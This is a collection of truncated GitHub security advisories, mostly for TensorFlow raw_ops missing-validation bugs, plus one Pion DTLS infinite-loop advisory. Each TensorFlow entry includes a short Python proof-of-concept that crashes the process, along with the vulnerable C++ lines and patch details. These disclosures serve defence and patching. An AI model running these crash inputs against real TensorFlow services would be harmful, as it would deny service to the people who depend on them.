GHSA-2vv3-56qg-g2cf: Missing validation causes denial of service via `LSTMBlockCell`

### Impact

The implementation of [`tf.raw_ops.LSTMBlockCell`](https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/core/kernels/rnn/lstm_ops.cc) does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack:

```python
import tensorflow as tf

tf.raw_ops.LSTMBlockCell(
  x=tf.constant(0.837607, shape=[28,29], dtype=tf.float32),
  cs_prev=tf.constant(0, shape=[28,17], dtype=tf.float32),
  h_prev=tf.constant(0.592631638, shape=[28,17], dtype=tf.float32),
  w=tf.constant(0.887386262, shape=[46,68], dtype=tf.float32),
  wci=tf.constant(0, shape=[], dtype=tf.float32),
  wcf=tf.constant(0, shape=[17], dtype=tf.float32),
  wco=tf.constant(0.592631638, shape=[28,17], dtype=tf.float32),
  b=tf.constant(0.75259006, shape=[68], dtype=tf.float32),
  forget_bias=1, cell_clip=0, use_peephole=False)
```

The code does not validate the ranks of any of the arguments to this API call...

GHSA-p9rc-rmr5-529j: Missing validation causes denial of service via `LoadAndRemapMatrix`

### Impact

The implementation of [`tf.raw_ops.LoadAndRemapMatrix`](https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/core/kernels/load_and_remap_matrix_op.cc#L70-L98) does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack:

```python
import tensorflow as tf

ckpt_path = tf.constant(
    "/tmp/warm_starting_util_test5kl2a3pc/tmpph76tep2/model-0", shape=[], dtype=tf.string)
old_tensor_name = tf.constant(
    "/tmp/warm_starting_util_test5kl2a3pc/tmpph76tep2/model-0", shape=[], dtype=tf.string)

row_remapping = tf.constant(0, shape=[], dtype=tf.int64)
col_remapping = tf.constant(3, shape=[3], dtype=tf.int64)
initializing_values = tf.constant([], shape=[0, 1], dtype=tf.float32)

tf.raw_ops.LoadAndRemapMatrix(
  ckpt_path=ckpt_path,
  old_tensor_name=old_tensor_name,
  row_remapping=row_remapping,
  col_remapping=col_remapping,
  initializing_values=initializing_va...
```

GHSA-mg66-qvc5-rm93: Missing validation causes denial of service via `SparseTensorToCSRSparseMatrix`

### Impact

The implementation of [`tf.raw_ops.SparseTensorToCSRSparseMatrix`](https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/core/kernels/sparse/sparse_tensor_to_csr_sparse_matrix_op.cc#L65-L119) does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack:

```python
import tensorflow as tf

indices = tf.constant(53, shape=[3], dtype=tf.int64)
values = tf.constant(0.554979503, shape=[218650], dtype=tf.float32)
dense_shape = tf.constant(53, shape=[3], dtype=tf.int64)

tf.raw_ops.SparseTensorToCSRSparseMatrix(
  indices=indices,
  values=values,
  dense_shape=dense_shape)
```

The code assumes `dense_shape` is a vector and `indices` is a matrix (as part of requirements for sparse tensors) but there is no validation for this:

```cc
const Tensor& indices = ctx->input(0);
const Tensor& values = ctx->input(1);
const Tensor& dense_shape = ctx->input(...
```

GHSA-hrg5-737c-2p56: Missing validation causes denial of service via `UnsortedSegmentJoin`

### Impact

The implementation of [`tf.raw_ops.UnsortedSegmentJoin`](https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/core/kernels/unsorted_segment_join_op.cc#L92-L95) does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack:

```python
import tensorflow as tf

tf.raw_ops.UnsortedSegmentJoin(
  inputs=tf.constant("this", shape=[12], dtype=tf.string),
  segment_ids=tf.constant(0, shape=[12], dtype=tf.int64),
  num_segments=tf.constant(0, shape=[12], dtype=tf.int64))
```

The code assumes `num_segments` is a scalar but there is no validation for this before accessing its value:

```cc
const Tensor& num_segments_tensor = context->input(2);
OP_REQUIRES(context, num_segments_tensor.NumElements() != 0,
            errors::InvalidArgument("Number of segments cannot be empty."));
auto num_segments = num_segments_tensor.scalar<NUM_SEGMENTS_TYPE>()();
```

### Patches...

GHSA-5v77-j66x-4c4g: Missing validation causes denial of service via `Conv3DBackpropFilterV2`

### Impact

The implementation of [`tf.raw_ops.Conv3DBackpropFilterV2`](https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/core/kernels/conv_grad_ops_3d.cc) does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack:

```python
import tensorflow as tf

tf.raw_ops.Conv3DBackpropFilterV2(
  input=tf.constant(.5053710941, shape=[2,2,2,2,1], dtype=tf.float16),
  filter_sizes=tf.constant(0, shape=[], dtype=tf.int32),
  out_backprop=tf.constant(.5053710941, shape=[2,2,2,2,1], dtype=tf.float16),
  strides=[1, 1, 1, 1, 1],
  padding="VALID",
  data_format="NDHWC",
  dilations=[1, 1, 1, 1, 1])
```

The code does not validate that the `filter_sizes` argument is a vector.

### Patches

We have patched the issue in GitHub commit [174c5096f303d5be7ed2ca2662b08371bff4ab88](https://github.com/tensorflow/tensorflow/commit/174c5096f303d5be7ed2ca2662b08371bff4ab88). The fix will ...

GHSA-h48f-q7rw-hvr7: Missing validation causes denial of service via `StagePeek`

### Impact

The implementation of [`tf.raw_ops.StagePeek`](https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/core/kernels/stage_op.cc#L261) does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack:

```python
import tensorflow as tf

index = tf.constant([], shape=[0], dtype=tf.int32)
tf.raw_ops.StagePeek(index=index, dtypes=[tf.int32])
```

The code assumes `index` is a scalar but there is no validation for this before accessing its value:

```cc
std::size_t index = ctx->input(0).scalar<int>()();
```

### Patches

We have patched the issue in GitHub commit [cebe3c45d76357d201c65bdbbf0dbe6e8a63bbdb](https://github.com/tensorflow/tensorflow/commit/cebe3c45d76357d201c65bdbbf0dbe6e8a63bbdb). The fix will be included in TensorFlow 2.9.0. We will also cherrypick this commit on TensorFlow 2.8.1, TensorFlow 2.7.2, and TensorFlow 2.6.4, as these are also affected and...

GHSA-h5g4-ppwx-48q2: Missing validation causes denial of service via `DeleteSessionTensor`

### Impact

The implementation of [`tf.raw_ops.DeleteSessionTensor`](https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/core/kernels/session_ops.cc#L128-L144) does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack:

```python
import tensorflow as tf

handle = tf.constant("[]", shape=[0], dtype=tf.string)
tf.raw_ops.DeleteSessionTensor(handle=handle)
```

The code assumes `handle` is a scalar but there is no validation for this:

```cc
const Tensor& handle = ctx->input(0);
const string& name = handle.scalar<tstring>()();
```

### Patches

We have patched the issue in GitHub commit [cff267650c6a1b266e4b4500f69fbc49cdd773c5](https://github.com/tensorflow/tensorflow/commit/cff267650c6a1b266e4b4500f69fbc49cdd773c5). The fix will be included in TensorFlow 2.9.0. We will also cherrypick this commit on TensorFlow 2.8.1, TensorFlow 2.7.2, and TensorFlow 2.6.4...

GHSA-h2wq-prv9-2f56: Missing validation crashes `QuantizeAndDequantizeV4Grad`

### Impact

The implementation of [`tf.raw_ops.QuantizeAndDequantizeV4Grad`](https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/core/kernels/quantize_and_dequantize_op.cc#L148-L226) does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack:

```python
import tensorflow as tf

tf.raw_ops.QuantizeAndDequantizeV4Grad(
  gradients=tf.constant(1, shape=[2,2], dtype=tf.float64),
  input=tf.constant(1, shape=[2,2], dtype=tf.float64),
  input_min=tf.constant([], shape=[0], dtype=tf.float64),
  input_max=tf.constant(-10, shape=[], dtype=tf.float64),
  axis=-1)
```

The code assumes `input_min` and `input_max` are scalars but there is no validation for this.

### Patches

We have patched the issue in GitHub commit [098e7762d909bac47ce1dbabe6dfd06294cb9d58](https://github.com/tensorflow/tensorflow/commit/098e7762d909bac47ce1dbabe6dfd06294cb9d58). The fix will be included ...

GHSA-fv25-wrff-wf86: Missing validation causes denial of service via `GetSessionTensor`

### Impact

The implementation of [`tf.raw_ops.GetSessionTensor`](https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/core/kernels/session_ops.cc#L94-L112) does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack:

```python
import tensorflow as tf

handle = tf.constant("[]", shape=[0], dtype=tf.string)
tf.raw_ops.GetSessionTensor(handle=handle)
```

The code assumes `handle` is a scalar but there is no validation for this:

```cc
const Tensor& handle = ctx->input(0);
const string& name = handle.scalar<tstring>()();
```

### Patches

We have patched the issue in GitHub commit [48305e8ffe5246d67570b64096a96f8e315a7281](https://github.com/tensorflow/tensorflow/commit/48305e8ffe5246d67570b64096a96f8e315a7281). The fix will be included in TensorFlow 2.9.0. We will also cherrypick this commit on TensorFlow 2.8.1, TensorFlow 2.7.2, and TensorFlow 2.6.4, as th...

GHSA-cm8f-h6j3-p25c: Header reconstruction method can be thrown into an infinite loop

### Impact

An attacker can send packets that will send Pion DTLS into an infinite loop when processing.

### Patches

Upgrade to Pion DTLS v2.1.4

### Workarounds

No workarounds available, upgrade to Pion DTLS v2.1.4

### References

Thank you to [Juho Nurminen](https://github.com/jupenur) and the Mattermost team for discovering and reporting this.

### For more information

If you have any questions or comments about this advisory:

* Open an issue in [Pion DTLS](http://github.com/pion/dtls)
* Email us at [[email protected]](mailto:[email protected])